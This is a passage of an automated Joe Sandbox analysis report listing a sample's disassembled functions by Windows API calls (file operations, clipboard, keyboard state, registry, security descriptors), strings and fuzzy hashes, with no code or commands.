Instruction ID: c7fc761d62d9322e192412d5eb990a0a192e388a1b0a3a72237997e072adb70c
Opcode Fuzzy Hash: 09251acc711891ad03cc6345976b467b5195ab2435a5a066044240ed0570c8cb
Instruction Fuzzy Hash: 60819AB5940209BFDF11DFE4DD49AEEBBB8EF58304F04412AF924A6161DB318E85DB21

Function 00A560DD Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 174filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00A56EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A55FA6,?), ref: 00A56ED8

Part of subcall function 00A56EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00A55FA6,?), ref: 00A56EF1

Part of subcall function 00A5725E: __wsplitpath.LIBCMT ref: 00A5727B
Part of subcall function 00A5725E: __wsplitpath.LIBCMT ref: 00A5728E

Part of subcall function 00A572CB: GetFileAttributesW.KERNEL32(?,00A56019), ref: 00A572CC

_wcscat.LIBCMT ref: 00A56149
_wcscat.LIBCMT ref: 00A56167
__wsplitpath.LIBCMT ref: 00A5618E
FindFirstFileW.KERNEL32(?,?), ref: 00A561A4
_wcscpy.LIBCMT ref: 00A56209
_wcscat.LIBCMT ref: 00A5621C
_wcscat.LIBCMT ref: 00A5622F
lstrcmpiW.KERNEL32(?,?), ref: 00A5625D
DeleteFileW.KERNEL32(?), ref: 00A5626E
MoveFileW.KERNEL32(?,?), ref: 00A56289
MoveFileW.KERNEL32(?,?), ref: 00A56298
CopyFileW.KERNEL32(?,?,00000000), ref: 00A562AD
DeleteFileW.KERNEL32(?), ref: 00A562BE
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A562E1
FindClose.KERNEL32(00000000), ref: 00A562FD
FindClose.KERNEL32(00000000), ref: 00A5630B

Strings

p1Wu`KXu, xrefs: 00A561BA
\*.*, xrefs: 00A56138, 00A56147, 00A56165

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: File$Find_wcscat$__wsplitpath$CloseDeleteFullMoveNamePath$AttributesCopyFirstNext_wcscpylstrcmpi
String ID: \*.*$p1Wu`KXu
API String ID: 1917200108-2866000061
Opcode ID: e30e763621892c4077f0b2d51a7f9fb7aedc1376424c716ae00b03c2861081bc
Instruction ID: d7564c58610b0ca603536bfa1d78293b2e08d580632e4cb0509a1bdfdf315028
Opcode Fuzzy Hash: e30e763621892c4077f0b2d51a7f9fb7aedc1376424c716ae00b03c2861081bc
Instruction Fuzzy Hash: F9510C7290811C6ACB21EBA1CD45DEFB7BCBB05311F4501EAE985A3141EE36968D8FA4

Function 00A66B0C Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(00AADC00), ref: 00A66B36
IsClipboardFormatAvailable.USER32(0000000D), ref: 00A66B44
GetClipboardData.USER32(0000000D), ref: 00A66B4C
CloseClipboard.USER32 ref: 00A66B58
GlobalLock.KERNEL32(00000000), ref: 00A66B74
CloseClipboard.USER32 ref: 00A66B7E
GlobalUnlock.KERNEL32(00000000), ref: 00A66B93
IsClipboardFormatAvailable.USER32(00000001), ref: 00A66BA0
GetClipboardData.USER32(00000001), ref: 00A66BA8
GlobalLock.KERNEL32(00000000), ref: 00A66BB5
GlobalUnlock.KERNEL32(00000000), ref: 00A66BE9
CloseClipboard.USER32 ref: 00A66CF6

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
String ID:
API String ID: 3222323430-0
Opcode ID: 8b89a18515831394a5758ecf2a01394b70e6a29e628b3a485f37b7d3b0cd7350
Instruction ID: f1f839b899b89a75180f0568f29de2f8df7ffc5cb15c65218d0a0e33cc1f398d
Opcode Fuzzy Hash: 8b89a18515831394a5758ecf2a01394b70e6a29e628b3a485f37b7d3b0cd7350
Instruction Fuzzy Hash: EF517E71344301ABD301EFA4DE86FAE77B8AF88B11F00452AF696D61D1DF70D9468B62

Function 00A5F5FA Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 278timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 00A5F62B
FindClose.KERNEL32(00000000), ref: 00A5F67F
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A5F6A4
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A5F6BB
FileTimeToSystemTime.KERNEL32(?,?), ref: 00A5F6E2
__swprintf.LIBCMT ref: 00A5F72E
__swprintf.LIBCMT ref: 00A5F767
__swprintf.LIBCMT ref: 00A5F7BB

Part of subcall function 00A3172B: __woutput_l.LIBCMT ref: 00A31784

__swprintf.LIBCMT ref: 00A5F809
__swprintf.LIBCMT ref: 00A5F858
__swprintf.LIBCMT ref: 00A5F8A7
__swprintf.LIBCMT ref: 00A5F8F6

Strings

%02d, xrefs: 00A5F7B0, 00A5F7B9, 00A5F807, 00A5F856, 00A5F8A5, 00A5F8F4
%4d%02d%02d%02d%02d%02d, xrefs: 00A5F728
%4d, xrefs: 00A5F761

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: __swprintf$FileTime$FindLocal$CloseFirstSystem__woutput_l
String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
API String ID: 835046349-2428617273
Opcode ID: f22ec563d6aaa857d7b96f5116a01e7e5c59ce7cf6ca6825e981b276f7482a61
Instruction ID: a1340b704081066299a5677bbdd8e8698923195e1a04c8dea5357415056ac7e7
Opcode Fuzzy Hash: f22ec563d6aaa857d7b96f5116a01e7e5c59ce7cf6ca6825e981b276f7482a61
Instruction Fuzzy Hash: 70A12EB2508344ABC310EBA4D985DAFB7ECBF98700F44092EF595C7191EB34DA49CB62

Function 00A61B2F Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00A61B50
_wcscmp.LIBCMT ref: 00A61B65
_wcscmp.LIBCMT ref: 00A61B7C
GetFileAttributesW.KERNEL32(?), ref: 00A61B8E
SetFileAttributesW.KERNEL32(?,?), ref: 00A61BA8
FindNextFileW.KERNEL32(00000000,?), ref: 00A61BC0
FindClose.KERNEL32(00000000), ref: 00A61BCB
FindFirstFileW.KERNEL32(*.*,?), ref: 00A61BE7
_wcscmp.LIBCMT ref: 00A61C0E
_wcscmp.LIBCMT ref: 00A61C25
SetCurrentDirectoryW.KERNEL32(?), ref: 00A61C37
SetCurrentDirectoryW.KERNEL32(00AC39FC), ref: 00A61C55
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A61C5F
FindClose.KERNEL32(00000000), ref: 00A61C6C
FindClose.KERNEL32(00000000), ref: 00A61C7C

Strings

*.*, xrefs: 00A61BE2

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1803514871-438819550
Opcode ID: ae6244d771e9c599ba1c37c1db9405afd3db88483c9787b94b80e36044d96bdc
Instruction ID: cc752daadb8dde3539a8967515781afc41f62748d0fe941f22d73fbe83e7b489
Opcode Fuzzy Hash: ae6244d771e9c599ba1c37c1db9405afd3db88483c9787b94b80e36044d96bdc
Instruction Fuzzy Hash: BB3190326402197ADF10EBE4DC49EDE7BBCAF09364F144596F911E3090EB70DA858A64

Function 00A61C8A Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75568FB0,?,00000000), ref: 00A61CAB
_wcscmp.LIBCMT ref: 00A61CC0
_wcscmp.LIBCMT ref: 00A61CD7

Part of subcall function 00A56BD4: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00A56BEF

FindNextFileW.KERNEL32(00000000,?), ref: 00A61D06
FindClose.KERNEL32(00000000), ref: 00A61D11
FindFirstFileW.KERNEL32(*.*,?), ref: 00A61D2D
_wcscmp.LIBCMT ref: 00A61D54
_wcscmp.LIBCMT ref: 00A61D6B
SetCurrentDirectoryW.KERNEL32(?), ref: 00A61D7D
SetCurrentDirectoryW.KERNEL32(00AC39FC), ref: 00A61D9B
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A61DA5
FindClose.KERNEL32(00000000), ref: 00A61DB2
FindClose.KERNEL32(00000000), ref: 00A61DC2

Strings

*.*, xrefs: 00A61D28

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 1824444939-438819550
Opcode ID: b26b8b18abd347f51c682da032ddefb5abbd316b6103f5062b6b90915afeedaf
Instruction ID: 756c18cecda5b7d2f289972a0e71a8b7ad94b6654b1340317ccc377da6b75466
Opcode Fuzzy Hash: b26b8b18abd347f51c682da032ddefb5abbd316b6103f5062b6b90915afeedaf
Instruction Fuzzy Hash: 1331E63260061ABADF10EBA4DC49EDE7BBCAF45364F184956F801A3090EB70DE858A64

Function 00A17D19 Relevance: 23.7, APIs: 2, Strings: 11, Instructions: 962COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A17DBD

Strings

], xrefs: 00A17D9F
\, xrefs: 00A17E1D
[:<:]], xrefs: 00A17D1D
[, xrefs: 00A17E14
^, xrefs: 00A17D96
\, xrefs: 00A8F95B
\, xrefs: 00A17D89
\b(?=\w), xrefs: 00A8F85E
\b(?<=\w), xrefs: 00A8F877
Q\E, xrefs: 00A186D6
[:>:]], xrefs: 00A17D37

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: _memset
String ID: Q\E$[$[:<:]]$[:>:]]$\$\$\$\b(?<=\w)$\b(?=\w)$]$^
API String ID: 2102423945-2023335898
Opcode ID: 3e3dc7dfd6f8360ad06edee3794303b6c5bc72590023d12945ceb607ccdcaaf8
Instruction ID: 5268c88ba395505c3ed0fa663b5c3baf27010b1057c3911668f1e7ea3f6e98e5
Opcode Fuzzy Hash: 3e3dc7dfd6f8360ad06edee3794303b6c5bc72590023d12945ceb607ccdcaaf8
Instruction Fuzzy Hash: 22829F71D0421ADFCF24DF98C8807EDBBB1BF48320F258169D859AB291E7749E85CB90

Function 00A6091D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00A609DF
SystemTimeToFileTime.KERNEL32(?,?), ref: 00A609EF
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A609FB
__wsplitpath.LIBCMT ref: 00A60A59
_wcscat.LIBCMT ref: 00A60A71
_wcscat.LIBCMT ref: 00A60A83
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A60A98
SetCurrentDirectoryW.KERNEL32(?), ref: 00A60AAC
SetCurrentDirectoryW.KERNEL32(?), ref: 00A60ADE
SetCurrentDirectoryW.KERNEL32(?), ref: 00A60AFF
_wcscpy.LIBCMT ref: 00A60B0B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A60B4A

Strings

*.*, xrefs: 00A60B05

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 7e264ad7c1dc30e149209d232fd9802c4b40504fb28209206653032f076839be
Instruction ID: b4a1270f1e14545aa571243e30a360f7d3f908c66159d2b67f995999a9bbbb51
Opcode Fuzzy Hash: 7e264ad7c1dc30e149209d232fd9802c4b40504fb28209206653032f076839be
Instruction Fuzzy Hash: EE6147725082059FD710EF64C944EAFB3E9FF89310F04892AF999D7251DB31EA85CB92

Function 00A4A66C Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A4ABBB: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00A4ABD7
Part of subcall function 00A4ABBB: GetLastError.KERNEL32(?,00A4A69F,?,?,?), ref: 00A4ABE1
Part of subcall function 00A4ABBB: GetProcessHeap.KERNEL32(00000008,?,?,00A4A69F,?,?,?), ref: 00A4ABF0
Part of subcall function 00A4ABBB: HeapAlloc.KERNEL32(00000000,?,00A4A69F,?,?,?), ref: 00A4ABF7
Part of subcall function 00A4ABBB: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00A4AC0E

Part of subcall function 00A4AC56: GetProcessHeap.KERNEL32(00000008,00A4A6B5,00000000,00000000,?,00A4A6B5,?), ref: 00A4AC62
Part of subcall function 00A4AC56: HeapAlloc.KERNEL32(00000000,?,00A4A6B5,?), ref: 00A4AC69
Part of subcall function 00A4AC56: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00A4A6B5,?), ref: 00A4AC7A

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A4A6D0
_memset.LIBCMT ref: 00A4A6E5
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A4A704
GetLengthSid.ADVAPI32(?), ref: 00A4A715
GetAce.ADVAPI32(?,00000000,?), ref: 00A4A752
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A4A76E
GetLengthSid.ADVAPI32(?), ref: 00A4A78B
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00A4A79A
HeapAlloc.KERNEL32(00000000), ref: 00A4A7A1
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A4A7C2
CopySid.ADVAPI32(00000000), ref: 00A4A7C9
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A4A7FA
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A4A820
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A4A834

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 3996160137-0
Opcode ID: 8af65f60a7381f6db4c455f929481ad02e4497dd333c9f0a5731053474e8dd2d
Instruction ID: cd68069e5a50807114a0f9f89dbe8c940de09dab5cbdbe4a8ffacdc46232ab6d
Opcode Fuzzy Hash: 8af65f60a7381f6db4c455f929481ad02e4497dd333c9f0a5731053474e8dd2d
Instruction Fuzzy Hash: EC517F75A40109AFDF10CFA1DC44EEEBBB9FF54300F14812AF911A7291DB349A06CB61

Function 00A563F9 Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 89fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00A56EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00A55FA6,?), ref: 00A56ED8

Part of subcall function 00A572CB: GetFileAttributesW.KERNEL32(?,00A56019), ref: 00A572CC

_wcscat.LIBCMT ref: 00A56441
__wsplitpath.LIBCMT ref: 00A5645F
FindFirstFileW.KERNEL32(?,?), ref: 00A56474
_wcscpy.LIBCMT ref: 00A564A3
_wcscat.LIBCMT ref: 00A564B8
_wcscat.LIBCMT ref: 00A564CA
DeleteFileW.KERNEL32(?), ref: 00A564DA
FindNextFileW.KERNEL32(00000000,00000010), ref: 00A564EB
FindClose.KERNEL32(00000000), ref: 00A56506

Strings

p1Wu`KXu, xrefs: 00A564DA
\*.*, xrefs: 00A5643B

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
String ID: \*.*$p1Wu`KXu
API String ID: 2643075503-2866000061
Opcode ID: 4cbd135bdaa55b93c649053c25c7be018a8fd86cbf5b859ad48490a9baa8b6be
Instruction ID: 07118b991ecbd495e3c4d12937b24da59a55c256800a7b7e9eb72ab8ae90edc2
Opcode Fuzzy Hash: 4cbd135bdaa55b93c649053c25c7be018a8fd86cbf5b859ad48490a9baa8b6be
Instruction Fuzzy Hash: 2231A0B2408384AAC721DBE4C985EDBB7ECAF55310F44092BF9D8C3141EA35D54D87A7

Function 00A16F07 Relevance: 18.4, Strings: 14, Instructions: 883COMMON

Download Yara Rule

Strings

CRLF), xrefs: 00A92E43
NO_START_OPT), xrefs: 00A92CD1
NO_AUTO_POSSESS), xrefs: 00A92CB0
LF), xrefs: 00A92E26
BSR_UNICODE), xrefs: 00A92EBA
LIMIT_RECURSION=, xrefs: 00A92D7E
UTF), xrefs: 00A92C7C
ANYCRLF), xrefs: 00A92E7D
ANY), xrefs: 00A92E60
CR), xrefs: 00A92E09
UTF16), xrefs: 00A92C56
BSR_ANYCRLF), xrefs: 00A92EA0
UCP), xrefs: 00A92C8F
LIMIT_MATCH=, xrefs: 00A92CF2

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: 44c0134b45cddfb0d5fc74080b3e098792718b0cc764bd973963171028b6a570
Instruction ID: f45aa21054f66e00206eb77fc46cb113c2b05d2c537d8733cb19901f5739d09b
Opcode Fuzzy Hash: 44c0134b45cddfb0d5fc74080b3e098792718b0cc764bd973963171028b6a570
Instruction Fuzzy Hash: 28726F75E042199BDF24CF58D880BEEB7F5BF48310F24816AE815EB290DB749E81DB94

Function 00A731BC Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A73C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A72BB5,?,?), ref: 00A73C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A7328E

Part of subcall function 00A1936C: __swprintf.LIBCMT ref: 00A193AB
Part of subcall function 00A1936C: __itow.LIBCMT ref: 00A193DF

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00A7332D
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00A733C5
RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 00A73604
RegCloseKey.ADVAPI32(00000000), ref: 00A73611

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
String ID:
API String ID: 1240663315-0
Opcode ID: c8322bc5ca4c8dbb06ef7a07413a53f474cc092d0783df2ccd48b17c806a0d2d
Instruction ID: fde1c101dc5259c55141ab22664a07fe42f90d511bd58b4f6ec5e1d5711b393a
Opcode Fuzzy Hash: c8322bc5ca4c8dbb06ef7a07413a53f474cc092d0783df2ccd48b17c806a0d2d
Instruction Fuzzy Hash: 7FE15B71604210AFCB14DF28C991E6ABBE8EF88314F04C56DF55ADB2A1DB30EA45DB51

Function 00A52B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00A52B5F
GetAsyncKeyState.USER32(000000A0), ref: 00A52BE0
GetKeyState.USER32(000000A0), ref: 00A52BFB
GetAsyncKeyState.USER32(000000A1), ref: 00A52C15
GetKeyState.USER32(000000A1), ref: 00A52C2A
GetAsyncKeyState.USER32(00000011), ref: 00A52C42
GetKeyState.USER32(00000011), ref: 00A52C54
GetAsyncKeyState.USER32(00000012), ref: 00A52C6C
GetKeyState.USER32(00000012), ref: 00A52C7E
GetAsyncKeyState.USER32(0000005B), ref: 00A52C96
GetKeyState.USER32(0000005B), ref: 00A52CA8

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: fa548f6c07bb41c5fd6aafa90edaa2d1536c4174ada115d18a93045c96b2a349
Instruction ID: a994fa210138a1f7ce00979e029ca62091f740713af995a43b6c1e36fc8cd7ea
Opcode Fuzzy Hash: fa548f6c07bb41c5fd6aafa90edaa2d1536c4174ada115d18a93045c96b2a349
Instruction Fuzzy Hash: C8418474A047C96DFF359B6489043A9BEA07B13346F44809ADDC6562C3DBB499CCC7A2

Function 00A66D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00A66D2E
EmptyClipboard.USER32 ref: 00A66D34
GlobalAlloc.KERNEL32(00000002,?), ref: 00A66D49
CloseClipboard.USER32 ref: 00A66DE8

Memory Dump Source

Source File: 00000000.00000002.1481754944.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1481724647.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000A9D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481838791.0000000000ABE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481910281.0000000000ACA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1481958838.0000000000AD4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_bIcqeSVPW6.jbxd

Similarity

